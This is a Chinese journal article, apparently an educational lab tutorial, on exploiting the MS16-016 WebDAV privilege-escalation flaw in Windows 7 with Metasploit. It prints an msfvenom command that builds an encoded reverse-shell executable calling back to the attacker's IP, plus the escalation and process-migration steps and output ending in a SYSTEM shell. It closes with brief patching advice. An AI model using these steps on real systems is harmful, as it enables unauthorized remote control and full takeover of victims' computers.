APP下载

基于Metasploit的MS16-016本地溢出漏洞利用实战

2018-01-20赵秋

电脑知识与技术 2018年31期
关键词:监听IP地址攻击者

赵秋

摘要: 该文对MS16-016本地溢出漏洞做了简单介绍,文中分析了利用MS16-016本地溢出漏洞,渗透到Windows 7中并获取系统权限的实现方式,最后给出了对应的防范措施。

关键词: Metasploit;MS16-016;本地溢出漏洞

中图分类号:TP393      文献标识码:A      文章编号:1009-3044(2018)31-0216-01

1 漏洞介绍

MS16-016这个漏洞是由于Windows中的WebDAV未正确处理WebDAV客户端发送的信息导致的。若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。此漏洞存在于在:Windows Vista SP2、Windows Server 2008 x86 & x64、Windows Server 2008 R2 x64、Windows 7 x86 & x64、Windows 8.1 x86 & x64。系统中提升权限至系统权限,以下系统中导致系统拒绝服务(蓝屏):Windows Server 2012、Windows Server 2012 R2、Windows RT 8.1、Windows 10。

2 MS16-016本地溢出漏洞利用的实现

下面介绍在Kali中渗透Windows 7 x86的实现。Kali的IP地址为10.3.81.106,Windows 7 x86的IP地址为10.3.81.152,使用虚拟机kali 中的Metasploit利用MS16-016本地溢出漏洞对Windows 7的进行渗透,从而获得系统权限。

1) 在Kali上生成连接软件msf.exe,LHOST为Kali的IP地址

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.3.81.106 LPORT=4444 -f exe > msf.exe

2)在命令行下输入“msfconsole”,进入MSF的启动界面

root@kali:~# msfconsole

3)在Metasploit命令提示符下,使用use命令载入监听模块。设置payload为windows/meterpreter/reverse_tcp。设置本地监听主机IP地址为Kali的IP。可以使用show options查看相关参数,输入exploit命令开始监听。

4)将软件msf.exe发给Windows 7上运行,此时kali上会有连接提示,可以看见MSF弹回了一个session 1(会话连接)。接着,在Meterpreter Shell中利用getuid命令查看已获得的权限为user权限。我们要把它提升到system权限,即Windows最高权限。

5)输入命令background,把当前的metasploit shell转为后台执行。选择MS16-016这个漏洞在进行提权,同时设置刚才连接的ID为1。最后,执行exploit命令進行提权,可以看到成功的把漏洞利用到了PID为2872的进程中。

6)虽然提权成功了,但连接到的ID为1的会话连接中,执行getuid命令还是看见的是user权限。

msf exploit(windows/local/ms16_016_webdav) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > getuid

Server username: cmx-PC\cmx

7)使用migrate 命令,迁移到该进程ID中。

meterpreter > migrate 2872

[*] Migrating from 4068 to 2872...

[*] Migration completed successfully.

8)然后执行getuid命令再次查看权限,可以看到已经是系统权限了,输入shell测试。

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > shell

Process 608 created.

Channel 1 created.

Microsoft Windows [版本 6.1.7601]

版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\cmx\Desktop>

3 MS16-016本地溢出漏洞的防御

你也可以通过 Windows 更新获取此更新程序。在你开启自动更新后,系统会自动下载并安装此更新程序。https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2016/ms16-016用户可从此获取独立的更新程序包。此安全更新程序通过更正WebDAV验证输入的方式来修复这个漏洞。

参考文献:

[1] 祝烈煌,张子剑.网络攻防实战研究漏洞利用与提权[M].北京:电子工业出版社,2018.

[2][英]Nipun Jaswal,李华峰.精通Metasploit渗透测试[M]. 2版.北京:人民邮电出版社,2017.

[3] http://www.freebuf.com/vuls/95950.html.

猜你喜欢

监听IP地址攻击者
基于微分博弈的追逃问题最优策略设计
千元监听风格Hi-Fi箱新选择 Summer audio A-401
铁路远动系统几种组网方式IP地址的申请和设置
正面迎接批判
IP地址切换器(IPCFG)
基于SNMP的IP地址管理系统开发与应用
网络监听的防范措施
公安网络中IP地址智能管理的研究与思考
应召反潜时无人机监听航路的规划
有限次重复博弈下的网络攻击行为研究